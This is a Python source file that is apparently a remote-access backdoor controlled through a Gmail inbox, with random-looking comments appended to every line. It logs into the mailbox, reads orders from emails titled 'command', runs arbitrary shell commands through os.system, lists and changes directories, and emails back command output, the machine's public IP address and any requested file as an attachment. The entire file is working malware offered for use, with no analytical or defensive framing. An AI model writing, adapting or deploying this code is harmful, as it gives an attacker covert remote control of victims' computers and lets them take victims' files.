#LuL1x6d8jKo61Ena126
def getPubIp():#EYB84chk2G31eJ1O
    import socket#JGq4bu3hiTAbO
    website="start.parrotsec.org"#JC7Mo41Od0xznLiSdrJb1
    ip =socket.gethostbyname(website)#EG2eM0aEx342ArCM3l9kDIEJD
    port=80#lpCCwQVM0UT54D3Bv4Q
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)#bBT935Oj2cDf
    s.connect((ip,port))#I1oZ28j40d3QzoK3
    se="GET / HTTP/1.1\nHost: "+ip+"\n\n"#ox3hztnJd218cf7W2A5zfe24s
    s.send(se.encode('ascii'))#eeA7en34C7QdUz6eoy6E
    total=""#D52o0599Jv56ibWgo281r
    started=False#J75iml3xGU2S9M
    while True:#mO6NQ5kR51WhU
        re=s.recv(1024).decode('ascii')#vSXQ6413O9c5X
        total+=re#ybtXa3Sbeu51vzoTl
        if len(re)==0:#rQEIOQU51gyC18xoxlK4863
            break#L09XnR197zKHEj
    result=""#ClWEeR6nuz9N
    total=total.split("\n")#FBfHVGX6565L03m907
    for line in total:#Ol2sLh7YPt48k
        if 'Your IP' in line:#dG5We2NPaR
            result=line#q1P9p7xgFAV0EipCvEZoTi
            break#e9z3kB15F7bf
    result=result.split(" ")#Y2ZQ4QHfMG5T9sFM
    ip=result[-1]#UQW1VXB5d02k
    ip=ip[:-7]#kKW8j7PblkW
    s.close()#Zd3Zr76Ju0pfX
    return "Host connected with IP: "+ip#W1c0jdQvUH0RHo5f
#c6oig4kPksc
#Px0r4dcnp6o720BZEwk907D
#eA9ysle73TJW4NOGc9a
#p0wtSqzkB2In1NM25M77
#s8xWaa76P0hSrQ5H
#f72kh3Uu7068
def send(subject,message,fileName=""):#JRU14DC32d
    import smtplib#hNV33o0OUVn18AA1r3mK
    from email.mime.text import MIMEText#Cj4Q7cGN3sA4q2d
    from email.mime.multipart import MIMEMultipart#d1IiOsgMs1peL0I
    from email.mime.base import MIMEBase#o22248KykaxFY5u
    from email import encoders#r85680F1iI
    userName='Email_Address'#YcI7vADF0pqGdyjvI
    password='Email_Password'#aq5QchVRCda5SzRP2ZRR12Fek
    msg = MIMEMultipart()#QnH4psvrdF0iGlhMzcN9TB6
    msg['From'] = userName#O5tPoZ5okg4598ZiT5h
    msg['To'] = userName#l504VuoM8V
    msg['Subject'] = subject#nTx8t1Oavn3YRTCz33A2zXcmg
    body = message#N5fQzAwPy14j6ns
    msg.attach(MIMEText(body,'plain'))#Zm11b4Pn4s9JaJNJJ2Cq
    if len(fileName)>0:#PH0646N745jF9ds
        attachment=open(fileName,'rb')#mdtg8u27OTQc6b4vLM
        part = MIMEBase('application','octet-stream')#ZVqEi6ZfD381a
        part.set_payload((attachment).read())#t5sXF0fkg3cnWU177
        encoders.encode_base64(part)#X8IaBk049s3
        part.add_header('Content-Disposition',"attachment; filename= "+fileName)#osj4FEsAuer071tV
        msg.attach(part)#ok8086VPj8a7iA
    text = msg.as_string()#aD90Sk8W2DKz904r747c1
    server = smtplib.SMTP('smtp.gmail.com',587)#OAbiIM6s36Ki8C7775lgWB10y
    server.ehlo()#pN7jTnC0xNEsmVt1duA1T7tUa
    server.starttls()#BY7W7374HYS1c
    server.login(userName,password)#mD1pbfaG60zIy3IbGhXsh5
    server.sendmail(userName,userName,text)#AKzKkC68r3gu
    server.quit()#WEz1eXPlft451hB36nD854P
    #ao8MCjGZj1sTt3Nx55pu
def execute(order):#BZzzBnFrV4Yu
    import os#UEFm5MRFfCpZch6T4N4NCiY
    if "+system" in order:#OmrcoS9Z0VbT1KjSi3l2t81
        os.system(order[9:]+" >result")#g1Fpqo2V73sdFK6sq85R6A2
        send(order[9:],'resultFile',"result")#sa70c51N50
    if "+listdir" in order:#ddC8wK393XA
        filesl=os.listdir()
        files=""
        for i in filesl:
            files+=i
            if os.path.isdir(i):
                files+="    d"
            files+="\n"
        send('listdir',files)#TuubCpRFmUSjzL1Kh440FzC
    if "+getcwd" in order:#I4Cl4v255VDnY5CtMo8W5kqA
        send('getcwd',str(os.getcwd()))#rG6Uho46OkJ567I73iT8
    if "+goto" in order:#H12557w27XzSNc7H9BEPhw
        if os.path.exists(order[7:]):#hhk7NZ98Nmq4Ft4CIOL8
            os.chdir(order[7:])#GFUif2DJ7j
        execute("+getcwd")#E9MoOTX4aItQi9i26IE1Fcu1
    if "+download" in order:#nOB3LjZ3Tg
        if os.path.exists(order[11:]):#OAc5mNHF59tVE
            send(order[11:],"Here is your file",order[11:])#oi1a4X9247yl7yqX
    if "+getPubIp" in order:#BY0SBFrYU3
        send("IP",getPubIp())#W0yMWu5AbDw76
    if order=="+EXIT+":#XxkSQEUmif
        exit(0)#v58JB6n6Rd21KKIkZz768L
  #N1mSOuncQ7u
def receiveOrder(prevOrder):#Jt3a8enPLrM36TKp8oMQ
    import email#qj33Q21x4bapLzjY
    import imaplib#djQF5539WmoKA0h7soJW6
    from re import findall#GW9q0ldJb47kLrwVuL74
    from base64 import b64decode#rrL0WcB4tRib8e4t
    userName='Email_Address'#X5r6DIBWIflNGT0Ew49z1K0WT
    password='Email_Password'#EBT52yH5L1D
    mail=imaplib.IMAP4_SSL("imap.gmail.com")#mNfa8pUPNwU8l2G
    mail.login(userName,password)#ywbw37lfUh32Jm7nq9
    mail.select("INBOX")#oWytbLo861w9BLBj9H9O37l7
    emailID=mail.uid("search",None,"all")[1][0].split()[-1]#W1fq7568U16y
    commandEmail=mail.uid("fetch",emailID,'(RFC822)')[1][0][1].decode('utf-8')#lbgtcwM1Lo554I
    commandEmail=email.message_from_string(commandEmail)#BL95cJ2kguw76UW
    subject=commandEmail['Subject']#d0S8y625eyg48KHlGE
    #Content-Transfer-Encoding: 7bit#KAN1MZUJ4Y04v50ev
    order=findall(r"Content-Transfer-Encoding: 7bit\n+(.*?)\n",str(commandEmail))[0]#jI3Rb0534dYA9udeg
    #order=str(b64decode(order))[2:-5]#FqAv8V54tg1UXl
    if order != prevOrder and subject=='command':#xnsq6L4dr3NA5X0I6O
        execute(order)#laEXrLc3zzOeVO4
    return order#p0KQ5HSDn3KCllW42474
#uk1cr49tiqEKqNdP
#Olnzutr6UTD0Q8
execute("+getPubIp")#fa3G5Hfi5jm3
order=""#C87lytvDm24Ff6Oi7eFv


while True:#MVMF227l0cn5D4I6
    order=receiveOrder(order)#c4YLhCo01KY6x
